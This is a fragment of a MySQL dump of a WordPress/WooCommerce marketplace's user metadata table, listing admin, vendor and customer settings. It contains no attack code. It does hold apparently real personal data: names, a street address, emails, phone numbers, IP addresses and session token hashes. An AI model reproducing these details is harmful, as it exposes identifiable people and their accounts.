) ENGINE=InnoDB AUTO_INCREMENT=2182 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_usermeta`
--

LOCK TABLES `wp_usermeta` WRITE;
/*!40000 ALTER TABLE `wp_usermeta` DISABLE KEYS */;
INSERT INTO `wp_usermeta` VALUES (1,1,'nickname','sitemanager'),(2,1,'first_name','admin'),(3,1,'last_name','p'),(4,1,'description',''),(5,1,'rich_editing','true'),(6,1,'syntax_highlighting','true'),(7,1,'comment_shortcuts','false'),(8,1,'admin_color','fresh'),(9,1,'use_ssl','0'),(10,1,'show_admin_bar_front','true'),(11,1,'locale',''),(12,1,'wp_capabilities','a:17:{s:13:\"administrator\";b:1;s:18:\"arm_manage_members\";b:1;s:16:\"arm_manage_plans\";b:1;s:17:\"arm_manage_setups\";b:1;s:16:\"arm_manage_forms\";b:1;s:23:\"arm_manage_access_rules\";b:1;s:23:\"arm_manage_transactions\";b:1;s:30:\"arm_manage_email_notifications\";b:1;s:24:\"arm_manage_communication\";b:1;s:27:\"arm_manage_member_templates\";b:1;s:27:\"arm_manage_general_settings\";b:1;s:27:\"arm_manage_feature_settings\";b:1;s:25:\"arm_manage_block_settings\";b:1;s:27:\"arm_manage_payment_gateways\";b:1;s:17:\"arm_import_export\";b:1;s:24:\"arm_manage_subscriptions\";b:1;s:18:\"arm_growth_plugins\";b:1;}'),(13,1,'wp_user_level','10'),(14,1,'dismissed_wp_pointers','text_widget_custom_html,theme_editor_notice,plugin_editor_notice,tp09_edit_drag_drop_sort'),(15,1,'show_welcome_panel','1'),(17,1,'wp_dashboard_quick_press_last_post_id','2054'),(18,1,'community-events-location','a:1:{s:2:\"ip\";s:12:\"152.58.218.0\";}'),(19,1,'_woocommerce_tracks_anon_id','woo:7P5480nZxncr6kgcd0S+eggN'),(20,1,'wc_last_active','1683849600'),(22,2,'nickname','Alpha'),(23,2,'first_name',''),(24,2,'last_name',''),(25,2,'description',''),(26,2,'rich_editing','true'),(27,2,'syntax_highlighting','true'),(28,2,'comment_shortcuts','false'),(29,2,'admin_color','fresh'),(30,2,'use_ssl','0'),(31,2,'show_admin_bar_front',''),(32,2,'locale',''),(33,2,'wp_capabilities','a:1:{s:14:\"disable_vendor\";b:1;}'),(34,2,'wp_user_level','0'),(35,2,'shipping_class_id','29'),(36,2,'_vendor_term_id','30'),(37,2,'_vendor_page_title','Alpha'),(38,2,'dismissed_wp_pointers',''),(39,3,'nickname','Beta'),(40,3,'first_name',''),(41,3,'last_name',''),(42,3,'description',''),(43,3,'rich_editing','true'),(44,3,'syntax_highlighting','true'),(45,3,'comment_shortcuts','false'),(46,3,'admin_color','fresh'),(47,3,'use_ssl','0'),(48,3,'show_admin_bar_front','true'),(49,3,'locale',''),(50,3,'wp_capabilities','a:1:{s:9:\"dc_vendor\";b:1;}'),(51,3,'wp_user_level','0'),(52,3,'shipping_class_id','31'),(53,3,'_vendor_term_id','32'),(54,3,'_vendor_page_title','Beta'),(55,3,'dismissed_wp_pointers',''),(56,4,'nickname','Gamma'),(57,4,'first_name',''),(58,4,'last_name',''),(59,4,'description',''),(60,4,'rich_editing','true'),(61,4,'syntax_highlighting','true'),(62,4,'comment_shortcuts','false'),(63,4,'admin_color','fresh'),(64,4,'use_ssl','0'),(65,4,'show_admin_bar_front','true'),(66,4,'locale',''),(67,4,'wp_capabilities','a:1:{s:9:\"dc_vendor\";b:1;}'),(68,4,'wp_user_level','0'),(69,4,'shipping_class_id','33'),(70,4,'_vendor_term_id','34'),(71,4,'_vendor_page_title','Gamma'),(72,4,'dismissed_wp_pointers',''),(73,1,'wp_user-settings','libraryContent=browse&ampampmfold=o&ampampadvImgDetails=show&ampampeditor=tinymce&ampampimgsize=full&ampamphidetb=1&ampampeditor_plain_text_paste_warning=1&imgsize=full&mfold=o&editor=tinymce'),(74,1,'wp_user-settings-time','1665984937'),(75,2,'_wcmp_shipping_by_country','a:0:{}'),(76,2,'_wcmp_country_rates','a:1:{s:10:\"everywhere\";s:1:\"0\";}'),(77,2,'_wcmp_state_rates','a:0:{}'),(78,2,'_wcmp_shipping_by_distance_rates','a:1:{i:0;a:3:{s:18:\"wcmp_distance_rule\";s:5:\"up_to\";s:18:\"wcmp_distance_unit\";s:0:\"\";s:19:\"wcmp_distance_price\";s:0:\"\";}}'),(79,2,'_wcmp_shipping_by_distance','a:0:{}'),(80,2,'vendor_shipping_options','distance_by_zone'),(81,2,'last_update','1644905141'),(82,2,'_vendor_profile_image','456'),(83,2,'_vendor_country','Afghanistan'),(84,2,'_vendor_country_code','AF'),(85,2,'_vendor_payment_mode','payment_mode'),(86,2,'_vendor_bank_account_type','current'),(87,2,'vendor_shipping_policy',''),(88,2,'vendor_refund_policy',''),(89,2,'vendor_cancellation_policy',''),(90,2,'_vendor_added_product','1'),(91,4,'_vendor_added_product','1'),(92,3,'_vendor_added_product','1'),(95,2,'wc_last_active','1661126400'),(97,2,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:0:{}}'),(102,3,'session_tokens','a:8:{s:64:\"cea342e8994a93eb13be2b560ea084b262463b78fcedbe24a731a216cfd0e45b\";a:4:{s:10:\"expiration\";i:1709266456;s:2:\"ip\";s:13:\"79.98.111.132\";s:2:\"ua\";s:102:\"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36\";s:5:\"login\";i:1709093656;}s:64:\"298be51fe7c934f40d38aad37910010e417126181eb7627176970491c37868f8\";a:4:{s:10:\"expiration\";i:1709297858;s:2:\"ip\";s:12:\"171.244.0.91\";s:2:\"ua\";s:109:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\";s:5:\"login\";i:1709125058;}s:64:\"e87ca379035b801cfb7d2821f0d6d2cd5830fcdca2167f7696b55c671cd7d382\";a:4:{s:10:\"expiration\";i:1709312922;s:2:\"ip\";s:14:\"103.27.238.251\";s:2:\"ua\";s:110:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36\";s:5:\"login\";i:1709140122;}s:64:\"c4fb2bb62aff127f45adbe0162645b78681b19734118097cda26cecd3817f952\";a:4:{s:10:\"expiration\";i:1709322866;s:2:\"ip\";s:13:\"45.138.16.248\";s:2:\"ua\";s:11:\"Mozilla/5.0\";s:5:\"login\";i:1709150066;}s:64:\"e903f257e6de0cf2761fa170f286bce2dd37f6f522685ef290e364b30be20f9f\";a:4:{s:10:\"expiration\";i:1709374080;s:2:\"ip\";s:15:\"178.128.127.179\";s:2:\"ua\";s:102:\"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36\";s:5:\"login\";i:1709201280;}s:64:\"197522bbb158ced938fc512e7d33ed97f7c009df0d4878bd0ff83a25db6c7a71\";a:4:{s:10:\"expiration\";i:1709374170;s:2:\"ip\";s:13:\"45.80.158.114\";s:2:\"ua\";s:11:\"Mozilla/5.0\";s:5:\"login\";i:1709201370;}s:64:\"0010e960eda5354231a1d50e4724d3cc9b3286f78825b35f1a94cc51bf5a8405\";a:4:{s:10:\"expiration\";i:1709392792;s:2:\"ip\";s:11:\"94.23.9.160\";s:2:\"ua\";s:109:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36\";s:5:\"login\";i:1709219992;}s:64:\"8602c748ac6f38f40337c755976a2453873f6e0697976a9d2f95452f68c5d199\";a:4:{s:10:\"expiration\";i:1709431649;s:2:\"ip\";s:13:\"45.138.16.248\";s:2:\"ua\";s:11:\"Mozilla/5.0\";s:5:\"login\";i:1709258849;}}'),(103,3,'wc_last_active','1709251200'),(105,3,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:0:{}}'),(116,3,'_wcmp_shipping_by_country','a:0:{}'),(117,3,'_wcmp_country_rates','a:1:{s:10:\"everywhere\";s:1:\"0\";}'),(118,3,'_wcmp_state_rates','a:0:{}'),(119,3,'_wcmp_shipping_by_distance_rates','a:1:{i:0;a:3:{s:18:\"wcmp_distance_rule\";s:5:\"up_to\";s:18:\"wcmp_distance_unit\";s:0:\"\";s:19:\"wcmp_distance_price\";s:0:\"\";}}'),(120,3,'_wcmp_shipping_by_distance','a:0:{}'),(121,3,'vendor_shipping_options','distance_by_zone'),(122,3,'last_update','1643082879'),(123,3,'_vendor_country','Afghanistan'),(124,3,'_vendor_country_code','AF'),(125,3,'_vendor_payment_mode','payment_mode'),(126,3,'_vendor_bank_account_type','current'),(127,3,'vendor_shipping_policy',''),(128,3,'vendor_refund_policy',''),(129,3,'vendor_cancellation_policy',''),(130,4,'_wcmp_shipping_by_country','a:0:{}'),(131,4,'_wcmp_country_rates','a:1:{s:10:\"everywhere\";s:1:\"0\";}'),(132,4,'_wcmp_state_rates','a:0:{}'),(133,4,'_wcmp_shipping_by_distance_rates','a:1:{i:0;a:3:{s:18:\"wcmp_distance_rule\";s:5:\"up_to\";s:18:\"wcmp_distance_unit\";s:0:\"\";s:19:\"wcmp_distance_price\";s:0:\"\";}}'),(134,4,'_wcmp_shipping_by_distance','a:0:{}'),(135,4,'vendor_shipping_options','distance_by_zone'),(136,4,'last_update','1643082908'),(137,4,'_vendor_country','Afghanistan'),(138,4,'_vendor_country_code','AF'),(139,4,'_vendor_payment_mode','payment_mode'),(140,4,'_vendor_bank_account_type','current'),(141,4,'vendor_shipping_policy',''),(142,4,'vendor_refund_policy',''),(143,4,'vendor_cancellation_policy',''),(144,1,'last_update','1679982022'),(145,1,'billing_first_name','bavani'),(146,1,'billing_last_name','p'),(147,1,'billing_address_1','800 ,spandana towers'),(148,1,'billing_city','bangalore'),(149,1,'billing_state','KA'),(150,1,'billing_postcode','560078'),(151,1,'billing_country','IN'),(152,1,'billing_email','mango@homedirect.in'),(153,1,'billing_phone','123456'),(154,1,'shipping_first_name','bavani'),(155,1,'shipping_last_name','p'),(156,1,'shipping_address_1','800 ,spandana towers'),(157,1,'shipping_city','bangalore'),(158,1,'shipping_state','KA'),(159,1,'shipping_postcode','560078'),(160,1,'shipping_country','IN'),(161,1,'shipping_method','a:1:{i:0;s:16:\"free_shipping:11\";}'),(164,1,'paying_customer','1'),(168,2,'_order_count','0'),(200,1,'_previous_login','1648132895'),(201,1,'_current_login','1662396992'),(202,5,'nickname','mercury'),(203,5,'first_name',''),(204,5,'last_name',''),(205,5,'description',''),(206,5,'rich_editing','true'),(207,5,'syntax_highlighting','true'),(208,5,'comment_shortcuts','false'),(209,5,'admin_color','fresh'),(210,5,'use_ssl','0'),(211,5,'show_admin_bar_front',''),(212,5,'locale',''),(213,5,'wp_capabilities','a:1:{s:11:\"wcfm_vendor\";b:1;}'),(214,5,'wp_user_level','6'),(215,5,'dismissed_wp_pointers',''),(216,5,'store_name','m'),(217,5,'wcfmmp_store_name','m'),(219,5,'wcemailverified','true'),(220,5,'wcfmmp_profile_settings','a:9:{s:10:\"store_name\";s:1:\"m\";s:6:\"social\";a:0:{}s:7:\"payment\";a:0:{}s:5:\"phone\";s:0:\"\";s:10:\"show_email\";s:2:\"no\";s:8:\"location\";s:0:\"\";s:12:\"find_address\";s:0:\"\";s:6:\"banner\";i:0;s:16:\"customer_support\";a:0:{}}'),(221,5,'_wcfmmp_shipping','a:2:{s:28:\"_wcfmmp_user_shipping_enable\";s:3:\"yes\";s:26:\"_wcfmmp_user_shipping_type\";s:7:\"by_zone\";}'),(222,5,'_wcfmmp_profile_id','5'),(223,5,'_wcfmmp_unique_id','1643364661'),(224,5,'wcfm_register_on','1643328000'),(225,5,'_wcfmmp_avg_review_rating','0'),(226,5,'wcfm_vendor_store_hours_migrated','yes'),(227,5,'wcfm_register_member','yes'),(229,5,'wc_last_active','1728864000'),(230,5,'_store_setup','yes'),(234,5,'_previous_login','1709279067'),(235,5,'_current_login','1728913589'),(236,5,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:0:{}}'),(240,5,'_wcfm_menu_toggle_state','no'),(249,5,'_order_count','0'),(256,6,'nickname','asd'),(257,6,'first_name',''),(258,6,'last_name',''),(259,6,'description',''),(260,6,'rich_editing','true'),(261,6,'syntax_highlighting','true'),(262,6,'comment_shortcuts','false'),(263,6,'admin_color','fresh'),(264,6,'use_ssl','0'),(265,6,'show_admin_bar_front','true'),(266,6,'locale',''),(267,6,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(268,6,'wp_user_level','0'),(269,6,'aioseo_contact_methods_header',''),(270,6,'aioseo_twitter',''),(271,6,'aioseo_facebook',''),(272,6,'last_update','1643604791'),(274,6,'wc_last_active','1643587200'),(275,6,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:1:{s:32:\"16c222aa19898e5058938167c8ab6c57\";a:6:{s:3:\"key\";s:32:\"16c222aa19898e5058938167c8ab6c57\";s:10:\"product_id\";i:541;s:12:\"variation_id\";i:0;s:9:\"variation\";a:0:{}s:8:\"quantity\";i:1;s:9:\"data_hash\";s:32:\"b5c1d5ca8bae6d4896cf1807cdf763f0\";}}}'),(288,1,'aioseo_contact_methods_header',''),(289,1,'aioseo_twitter',''),(290,1,'aioseo_facebook',''),(325,8,'nickname','Bhhuik'),(326,8,'first_name',''),(327,8,'last_name',''),(328,8,'description',''),(329,8,'rich_editing','true'),(330,8,'syntax_highlighting','true'),(331,8,'comment_shortcuts','false'),(332,8,'admin_color','fresh'),(333,8,'use_ssl','0'),(334,8,'show_admin_bar_front','true'),(335,8,'locale',''),(336,8,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(337,8,'wp_user_level','0'),(338,8,'billing_phone','123679'),(339,8,'aioseo_contact_methods_header',''),(340,8,'aioseo_twitter',''),(341,8,'aioseo_facebook',''),(342,8,'last_update','1643790248'),(343,8,'session_tokens','a:1:{s:64:\"5592cd3813ee9b90bc965545e1f3b2635287404ee1f3500d9b01df5c01c1a8e9\";a:4:{s:10:\"expiration\";i:1644999848;s:2:\"ip\";s:14:\"157.45.168.207\";s:2:\"ua\";s:163:\"Mozilla/5.0 (Linux; Android 11; Redmi Note 8 Build/RKQ1.201004.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/97.0.4692.98 Mobile Safari/537.36\";s:5:\"login\";i:1643790248;}}'),(344,8,'wc_last_active','1643760000'),(388,1,'nav_menu_recently_edited','132'),(389,1,'managenav-menuscolumnshidden','a:5:{i:0;s:11:\"link-target\";i:1;s:11:\"css-classes\";i:2;s:3:\"xfn\";i:3;s:11:\"description\";i:4;s:15:\"title-attribute\";}'),(390,1,'metaboxhidden_nav-menus','a:7:{i:0;s:28:\"add-post-type-e-landing-page\";i:1;s:21:\"add-post-type-product\";i:2;s:12:\"add-post_tag\";i:3;s:13:\"add-pwb-brand\";i:4;s:15:\"add-product_cat\";i:5;s:15:\"add-product_tag\";i:6;s:17:\"add-wpfd-category\";}'),(391,1,'wp_metaboxhidden_nav-menus','a:6:{i:0;s:28:\"add-post-type-e-landing-page\";i:1;s:21:\"add-post-type-product\";i:2;s:12:\"add-post_tag\";i:3;s:13:\"add-pwb-brand\";i:4;s:15:\"add-product_cat\";i:5;s:15:\"add-product_tag\";}'),(401,5,'_wcfm_vendor_tax_migrated','yes'),(402,11,'nickname','abcde'),(403,11,'first_name',''),(404,11,'last_name',''),(405,11,'description',''),(406,11,'rich_editing','true'),(407,11,'syntax_highlighting','true'),(408,11,'comment_shortcuts','false'),(409,11,'admin_color','fresh'),(410,11,'use_ssl','0'),(411,11,'show_admin_bar_front','true'),(412,11,'locale',''),(413,11,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(414,11,'wp_user_level','0'),(415,11,'billing_phone','0987654321'),(416,11,'aioseo_contact_methods_header',''),(417,11,'aioseo_twitter',''),(418,11,'aioseo_facebook',''),(419,11,'last_update','1644216667'),(420,11,'session_tokens','a:1:{s:64:\"e55a1370e29d55d65c46670f1ae28b82b8070869425ff6ce795f711dedcdd44e\";a:4:{s:10:\"expiration\";i:1645426267;s:2:\"ip\";s:14:\"122.182.192.47\";s:2:\"ua\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36\";s:5:\"login\";i:1644216667;}}'),(421,11,'wc_last_active','1644192000'),(427,12,'nickname','nimyajose1011'),(428,12,'first_name',''),(429,12,'last_name',''),(430,12,'description',''),(431,12,'rich_editing','true'),(432,12,'syntax_highlighting','true'),(433,12,'comment_shortcuts','false'),(434,12,'admin_color','fresh'),(435,12,'use_ssl','0'),(436,12,'show_admin_bar_front','true'),(437,12,'locale',''),(438,12,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(439,12,'wp_user_level','0'),(440,12,'billing_phone','9497674907'),(441,12,'aioseo_contact_methods_header',''),(442,12,'aioseo_twitter',''),(443,12,'aioseo_facebook',''),(444,12,'last_update','1644294942'),(446,12,'wc_last_active','1644278400'),(453,12,'_previous_login',''),(454,12,'_current_login','1644328457'),(455,12,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:0:{}}'),(458,1,'_aioseo_plugin_review_dismissed','2'),(459,13,'nickname','1234'),(460,13,'first_name',''),(461,13,'last_name',''),(462,13,'description',''),(463,13,'rich_editing','true'),(464,13,'syntax_highlighting','true'),(465,13,'comment_shortcuts','false'),(466,13,'admin_color','fresh'),(467,13,'use_ssl','0'),(468,13,'show_admin_bar_front','true'),(469,13,'locale',''),(470,13,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(471,13,'wp_user_level','0'),(472,13,'billing_phone','1234567890'),(473,13,'aioseo_contact_methods_header',''),(474,13,'aioseo_twitter',''),(475,13,'aioseo_facebook',''),(476,13,'last_update','1644380724'),(478,13,'wc_last_active','1644796800'),(482,13,'_previous_login','1644415170'),(483,13,'_current_login','1644843629'),(484,13,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:1:{s:32:\"e7e56b1b54673c32e3e265c0fc530856\";a:13:{s:23:\"flexible_product_fields\";a:1:{i:0;a:2:{s:4:\"name\";s:54:\"Gift to someone !!!! Sent a message to your loved ones\";s:5:\"value\";s:5:\"uyuit\";}}s:34:\"flexible_product_fields_product_id\";s:3:\"542\";s:3:\"key\";s:32:\"e7e56b1b54673c32e3e265c0fc530856\";s:10:\"product_id\";i:542;s:12:\"variation_id\";i:0;s:9:\"variation\";a:0:{}s:8:\"quantity\";i:2;s:9:\"data_hash\";s:32:\"b5c1d5ca8bae6d4896cf1807cdf763f0\";s:13:\"line_tax_data\";a:2:{s:8:\"subtotal\";a:0:{}s:5:\"total\";a:0:{}}s:13:\"line_subtotal\";d:220;s:17:\"line_subtotal_tax\";i:0;s:10:\"line_total\";d:220;s:8:\"line_tax\";i:0;}}}'),(498,2,'session_tokens','a:1:{s:64:\"bfb17de1fa648f887ac930e84d225c3498801949614e079ccabf1378803ed3bb\";a:4:{s:10:\"expiration\";i:1661341596;s:2:\"ip\";s:15:\"104.233.179.113\";s:2:\"ua\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/587.38 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36\";s:5:\"login\";i:1661168796;}}'),(500,2,'_previous_login','1658060098'),(501,2,'_current_login','1661188596'),(505,2,'_woocommerce_tracks_anon_id','woo:EEmTlfbw39ljh5xFS0R93bdn'),(508,4,'session_tokens','a:6:{s:64:\"1149c4f6739fb13fa17a6a71f1581ff0fc6e735b52e36ca6cf3e9cc183a14ba0\";a:4:{s:10:\"expiration\";i:1709313216;s:2:\"ip\";s:15:\"165.232.180.240\";s:2:\"ua\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36\";s:5:\"login\";i:1709140416;}s:64:\"cf0b75d6ae2fe978641ae7b0177ba842b8be12ba30b58c7a827064746636d8d7\";a:4:{s:10:\"expiration\";i:1709322866;s:2:\"ip\";s:13:\"45.138.16.248\";s:2:\"ua\";s:11:\"Mozilla/5.0\";s:5:\"login\";i:1709150066;}s:64:\"0109c94598ee4790507e305ed00cb163b3bf741b5d42ae0a6e2a911bec3edaab\";a:4:{s:10:\"expiration\";i:1709374170;s:2:\"ip\";s:13:\"45.80.158.114\";s:2:\"ua\";s:11:\"Mozilla/5.0\";s:5:\"login\";i:1709201370;}s:64:\"c6fd278998c0696ffd20f2f687aa0600fd35242f27654120dc77e39a043bb1bb\";a:4:{s:10:\"expiration\";i:1709374379;s:2:\"ip\";s:14:\"151.106.38.166\";s:2:\"ua\";s:102:\"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36\";s:5:\"login\";i:1709201579;}s:64:\"1eba3ad959320475997822958eb7e2d08a82f525e5607029ee066ee94df50a68\";a:4:{s:10:\"expiration\";i:1709393099;s:2:\"ip\";s:14:\"184.168.126.98\";s:2:\"ua\";s:110:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36\";s:5:\"login\";i:1709220299;}s:64:\"1d0dfb6145309a17e6150f864040bfef79f9bca511f8524c4d5ae1fe87151c87\";a:4:{s:10:\"expiration\";i:1709431649;s:2:\"ip\";s:13:\"45.138.16.248\";s:2:\"ua\";s:11:\"Mozilla/5.0\";s:5:\"login\";i:1709258849;}}'),(509,4,'wc_last_active','1709251200'),(511,4,'_previous_login','1709240099'),(512,4,'_current_login','1709278649'),(513,4,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:0:{}}'),(517,4,'_order_count','0'),(519,3,'_previous_login','1709239792'),(520,3,'_current_login','1709278649'),(521,3,'_order_count','0'),(532,1,'pll_filter_content','en'),(535,2,'wp_dashboard_quick_press_last_post_id','969'),(536,2,'community-events-location','a:1:{s:2:\"ip\";s:11:\"202.67.45.0\";}'),(538,13,'_order_count','0'),(539,13,'_last_order',NULL),(543,2,'store_name','a'),(544,2,'wcfmmp_store_name','a'),(546,2,'wcemailverified','true'),(547,2,'wcfmmp_profile_settings','a:14:{s:10:\"store_name\";s:1:\"a\";s:6:\"social\";a:8:{s:7:\"twitter\";s:0:\"\";s:2:\"fb\";s:0:\"\";s:9:\"instagram\";s:0:\"\";s:7:\"youtube\";s:0:\"\";s:8:\"linkedin\";s:0:\"\";s:5:\"gplus\";s:0:\"\";s:8:\"snapchat\";s:0:\"\";s:9:\"pinterest\";s:0:\"\";}s:7:\"payment\";a:4:{s:6:\"method\";s:6:\"paypal\";s:6:\"paypal\";a:1:{s:5:\"email\";s:0:\"\";}s:6:\"skrill\";a:1:{s:5:\"email\";s:0:\"\";}s:4:\"bank\";a:8:{s:7:\"ac_name\";s:0:\"\";s:9:\"ac_number\";s:0:\"\";s:9:\"bank_name\";s:0:\"\";s:9:\"bank_addr\";s:0:\"\";s:14:\"routing_number\";s:0:\"\";s:4:\"iban\";s:0:\"\";s:5:\"swift\";s:0:\"\";s:4:\"ifsc\";s:0:\"\";}}s:5:\"phone\";s:0:\"\";s:10:\"show_email\";s:2:\"no\";s:8:\"location\";s:0:\"\";s:12:\"find_address\";s:0:\"\";s:6:\"banner\";s:0:\"\";s:16:\"customer_support\";a:0:{}s:8:\"gravatar\";s:0:\"\";s:11:\"store_email\";s:11:\"a@gmail.com\";s:7:\"address\";a:6:{s:8:\"street_1\";s:0:\"\";s:8:\"street_2\";s:0:\"\";s:4:\"city\";s:0:\"\";s:3:\"zip\";s:0:\"\";s:7:\"country\";s:0:\"\";s:5:\"state\";s:0:\"\";}s:11:\"geolocation\";a:3:{s:14:\"store_location\";s:0:\"\";s:9:\"store_lat\";s:1:\"0\";s:9:\"store_lng\";s:1:\"0\";}s:9:\"store_seo\";a:9:{s:21:\"wcfmmp-seo-meta-title\";s:0:\"\";s:20:\"wcfmmp-seo-meta-desc\";s:0:\"\";s:24:\"wcfmmp-seo-meta-keywords\";s:0:\"\";s:19:\"wcfmmp-seo-og-title\";s:0:\"\";s:18:\"wcfmmp-seo-og-desc\";s:0:\"\";s:19:\"wcfmmp-seo-og-image\";s:0:\"\";s:24:\"wcfmmp-seo-twitter-title\";s:0:\"\";s:23:\"wcfmmp-seo-twitter-desc\";s:0:\"\";s:24:\"wcfmmp-seo-twitter-image\";s:0:\"\";}}'),(548,2,'_wcfmmp_shipping','a:2:{s:28:\"_wcfmmp_user_shipping_enable\";s:3:\"yes\";s:26:\"_wcfmmp_user_shipping_type\";s:7:\"by_zone\";}'),(549,2,'_wcfmmp_profile_id','2'),(550,2,'_wcfmmp_unique_id','1644924942'),(551,2,'wcfm_register_on','1644883200'),(552,2,'_wcfmmp_avg_review_rating','0'),(553,2,'wcfm_vendor_store_hours_migrated','yes'),(554,2,'wcfm_register_member','yes'),(555,2,'_store_setup','yes'),(556,2,'_wcfm_street_1',''),(557,2,'_wcfm_street_2',''),(558,2,'_wcfm_city',''),(559,2,'_wcfm_zip',''),(560,2,'_wcfm_country',''),(561,2,'_wcfm_state',''),(562,2,'_wcfm_store_location',''),(563,2,'_wcfm_store_lat','0'),(564,2,'_wcfm_store_lng','0'),(565,2,'_store_description',''),(566,2,'wcfm_seo_vendor_options','a:9:{s:21:\"wcfmmp-seo-meta-title\";s:0:\"\";s:20:\"wcfmmp-seo-meta-desc\";s:0:\"\";s:24:\"wcfmmp-seo-meta-keywords\";s:0:\"\";s:19:\"wcfmmp-seo-og-title\";s:0:\"\";s:18:\"wcfmmp-seo-og-desc\";s:0:\"\";s:19:\"wcfmmp-seo-og-image\";s:0:\"\";s:24:\"wcfmmp-seo-twitter-title\";s:0:\"\";s:23:\"wcfmmp-seo-twitter-desc\";s:0:\"\";s:24:\"wcfmmp-seo-twitter-image\";s:0:\"\";}'),(569,14,'nickname','venkateshavn'),(570,14,'first_name','venkateshavn'),(571,14,'last_name',''),(572,14,'description',''),(573,14,'rich_editing','true'),(574,14,'syntax_highlighting','true'),(575,14,'comment_shortcuts','false'),(576,14,'admin_color','fresh'),(577,14,'use_ssl','0'),(578,14,'show_admin_bar_front',''),(579,14,'locale',''),(580,14,'wp_capabilities','a:1:{s:11:\"wcfm_vendor\";b:1;}'),(581,14,'wp_user_level','6'),(582,14,'last_update','1644909337'),(583,14,'dismissed_wp_pointers',''),(584,14,'store_name','venkateshavn'),(585,14,'wcfmmp_store_name','venkateshavn'),(587,14,'wcemailverified','true'),(588,14,'wcfmmp_profile_settings','a:13:{s:10:\"store_name\";s:12:\"venkateshavn\";s:6:\"social\";a:0:{}s:7:\"payment\";a:0:{}s:5:\"phone\";s:0:\"\";s:10:\"show_email\";s:2:\"no\";s:8:\"location\";s:0:\"\";s:12:\"find_address\";s:0:\"\";s:6:\"banner\";s:0:\"\";s:16:\"customer_support\";a:0:{}s:8:\"gravatar\";s:0:\"\";s:11:\"store_email\";s:22:\"venkateshavn@yahoo.com\";s:7:\"address\";a:6:{s:8:\"street_1\";s:10:\"HSR layout\";s:8:\"street_2\";s:22:\"Aishwarya Super Market\";s:4:\"city\";s:9:\"Bangalore\";s:3:\"zip\";s:6:\"560102\";s:7:\"country\";s:2:\"IN\";s:5:\"state\";s:2:\"KA\";}s:11:\"geolocation\";a:3:{s:14:\"store_location\";s:0:\"\";s:9:\"store_lat\";s:1:\"0\";s:9:\"store_lng\";s:1:\"0\";}}'),(589,14,'_wcfmmp_shipping','a:2:{s:28:\"_wcfmmp_user_shipping_enable\";s:3:\"yes\";s:26:\"_wcfmmp_user_shipping_type\";s:7:\"by_zone\";}'),(590,14,'_wcfmmp_profile_id','14'),(591,14,'_wcfmmp_unique_id','1644929137'),(592,14,'wcfm_register_on','1644883200'),(593,14,'_wcfmmp_avg_review_rating','0'),(594,14,'wcfm_vendor_store_hours_migrated','yes'),(595,14,'wcfm_register_member','yes'),(597,14,'wc_last_active','1644883200'),(598,14,'_store_setup','yes'),(599,14,'_wcfm_street_1','HSR layout'),(600,14,'_wcfm_street_2','Aishwarya Super Market'),(601,14,'_wcfm_city','Bangalore'),(602,14,'_wcfm_zip','560102'),(603,14,'_wcfm_country','IN'),(604,14,'_wcfm_state','KA'),(605,14,'_wcfm_store_location',''),(606,14,'_wcfm_store_lat','0'),(607,14,'_wcfm_store_lng','0'),(608,14,'_store_description',''),(615,1,'billing_company',''),(616,1,'billing_address_2','hsr layout'),(617,1,'shipping_company',''),(618,1,'shipping_address_2','hsr layout'),(619,1,'shipping_phone',''),(623,1,'elementor_introduction','a:1:{s:19:\"aioseo-introduction\";b:1;}'),(625,15,'nickname','Nimyajose10'),(626,15,'first_name',''),(627,15,'last_name',''),(628,15,'description',''),(629,15,'rich_editing','true'),(630,15,'syntax_highlighting','true'),(631,15,'comment_shortcuts','false'),(632,15,'admin_color','fresh'),(633,15,'use_ssl','0'),(634,15,'show_admin_bar_front','true'),(635,15,'locale',''),(636,15,'wp_capabilities','a:1:{s:11:\"wcfm_vendor\";b:1;}'),(637,15,'wp_user_level','6'),(638,15,'last_update','1645768573'),(639,15,'dismissed_wp_pointers',''),(640,15,'store_name','Njjo'),(641,15,'wcfmmp_store_name','Njjo'),(642,15,'wcfmvm_custom_infos','a:6:{s:30:\"total-acres-of-mango-farm-land\";s:0:\"\";s:24:\"varieties-of-mango-grown\";s:0:\"\";s:15:\"last-year-yield\";s:0:\"\";s:19:\"expected-yield-2022\";s:0:\"\";s:15:\"